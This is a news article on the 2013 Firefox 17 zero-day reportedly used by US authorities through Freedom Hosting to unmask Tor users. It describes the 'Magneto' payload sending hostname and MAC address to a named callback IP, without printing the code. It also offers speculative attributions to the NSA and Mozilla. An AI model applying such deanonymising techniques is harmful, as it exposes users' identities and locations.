Firefox Zero-day exploited against Tor anonymity

Security researchers found a malicious script that takes advantage of a Firefox Zero-day to identify some users of the Tor anonymity network.

My readers know very well Tor network and the capability of the system to remain anonymous under specific conditions. We have used terms such as Deep Web, Dark web and hidden web to remark the impossibility to track users in this obscure part of the Internet, but there are some exceptions.

Tor network is a precious resource for freedom of expression, thanks to its system hacktivists, dissidents and whistleblowers could spread their voice to the international community, but it is also true that this network are abused by cyber criminals and intelligence agencies.

As I presented in one of my research the contents on drugs, child pornography and on many other illegal activities are the principal resources available in the Tor network, we are facing with a market characterized by impressive figures, and websites such as SilkRoad are just the tip of the iceberg.

FBI is exploiting a Firefox Zero-day for Firefox 17 version to track Tor users, be aware the Bureau didn’t compromise the Tor system but it exploited a flaw in the Tor browser to implant a tracking cookie which fingerprinted users through a specific external server.

Mozilla declared that it has been announced the presence of a potential security vulnerability in Firefox 17 (MFSA 2013-53) , which is currently the extended support release (ESR) version of Firefox.

“Security researcher Nils reported that specially crafted web content using the onreadystatechange event and reloading of pages could sometimes cause a crash when unmapped memory is executed. This crash is potentially exploitable.”

The Exploit code posted by Mozilla and Deobfuscated JS used by the Tor Browser exploit posted on Google Code.

The exploit is based on a Javascript that is a tiny Windows executable hidden in a variable dubbed “Magneto”. Magneto code looks up the victim’s Windows hostname and MAC address and sends the information back to the FBI Virginia server exposing the victims’s real IP address. The script sends back the data with a standard HTTP web request outside the Tor Network.

The security expert and exploit developer Vlad Tsyrklevich analyzed the JavaScript code’s payload noting that it connects to a server to send back the user’s data.

“Briefly, this payload connects to 65.222.202.54:80 and sends it an HTTP request that includes the host name (via gethostname()) and the MAC address of the local host (via calling SendARP on gethostbyname()->h_addr_list). After that it cleans up the state and appears to deliberately crash.”

If Tsrklevich is right, the code could be considered as the first sample captured in the wild of the FBI’s “computer and internet protocol address verifier,” aka CIPAV, the law enforcement spyware first reported by WIRED in 2007.

“Court documents and FBI files released under the FOIA have described the CIPAV as software the FBI can deliver through a browser exploit to gathers information from the target’s machine and send it to an FBI server in Virginia. The FBI has been using the CIPAV since 2002 against hackers, online sexual predator, extortionists and others, primarily to identify suspects who are disguising their location using proxy servers or anonymity services, like Tor.” reported Wired post.

Recently in Ireland it has been arrested Eric Eoin Marques, the young man believed to be behind Freedom Hosting, the biggest service provider for sites on the encrypted Tor network  and he is accused of favoring the dissemination activities of child pornography.

Marques was being arrested on a Maryland warrant after around a year of intense investigation, he faced four charges relating to alleged child pornography offenses with a total of 30 years jail. The accusers are severe, the FBI considers the man as “the largest facilitator of child porn on the planet.”

In 2011, the collective Anonymous attacked Freedom Hosting with a denial-of-service after allegedly finding the firm hosted 95 percent of the child porn hidden services on the Tor network.

With Marques arrest many popular websites on the DeepWeb went down including services like Tor Mail, HackBB and the Hidden Wiki that are all hosted on Freedom Hosting. The concerning news is that in reality many other Tor hidden services may be compromised using a browser exploit.

“The current news indicates that someone has exploited the software behind Freedom Hosting. From what is known so far, the breach was used to configure the server in a way that it injects some sort of javascript exploit in the web pages delivered to users. This exploit is used to load a malware payload to infect users’ computers. The malware payload could be trying to exploit potential bugs in Firefox 17 ESR, on which our Tor Browser is based. We’re investigating these bugs and will fix them if we can.” revealed Andrew Lewman, Tor Project’s Executive Director said in a blog post.

For massive distribution of the malicious script FBI has used Freedom Hosting platform injecting its HTML code within page visited by victims. The script first checks the version of the user’s browser and if it recognizes that he is using Firefox 17 then it collects the above information.

Shortly after Marques’ arrest all of the hidden service sites hosted by Freedom Hosting began displaying a “Down for Maintenance” message. Some users noted the presence of a malicious script in the source code of the maintenance page, it included a hidden iframe tag that loaded a mysterious clump of Javascript code from a Verizon Business internet address located in eastern Virginia.

FBI or NSA?

Despite initially the researchers accused FBI for the design of the malicious script, it appears that the IP address found in the script belongs to the National Security Agency (NSA). This revelation has been done by Baneki Privacy Labs, a collective of Internet security researchers, and VPN provider Cryptocloud.

“Initial investigations traced the address to defense contractor SAIC, which provides a wide range of information technology and C4ISR (Command, Control, Communications, Computers, Intelligence, Surveillance, and Reconnaissance) support to the Department of Defense. The geolocation of the IP address corresponds to an SAIC facility in Arlington, Virginia. Further analysis using a DNS record tool from Robotex found that the address was actually part of several blocks of IP addresses permanently assigned to the NSA. This immediately spooked the researchers. “One researcher contacted us and said, ‘Here’s the Robotex info. Forget that you heard it from me,'” a member of Baneki who requested he not be identified told Ars.” revealed a post published on ArsTechnica

Does Mozilla work for US government?

Another strange circumstance is that in the past the browser disabled JavaScript execution by default for security purposes, but the setting was reverted by default to make more usable, and more vulnerable, the browser.

The consequence could be dramatic for a huge quantity of hacktivist and dissidents, the exploits of Firefox Zero-day may have favored regime and the tracking of innocent user opposed to Governments censorship.

Meantime … if you are a Windows user Update your Tor Browser Bundle to new version 3.0 alpha2 released today.

[adrotate banner=”9″]

[adrotate banner=”12″]

Pierluigi Paganini

(Security Affairs – Firefox Zero-day, FBI)

[adrotate banner=”5″]

[adrotate banner=”13″]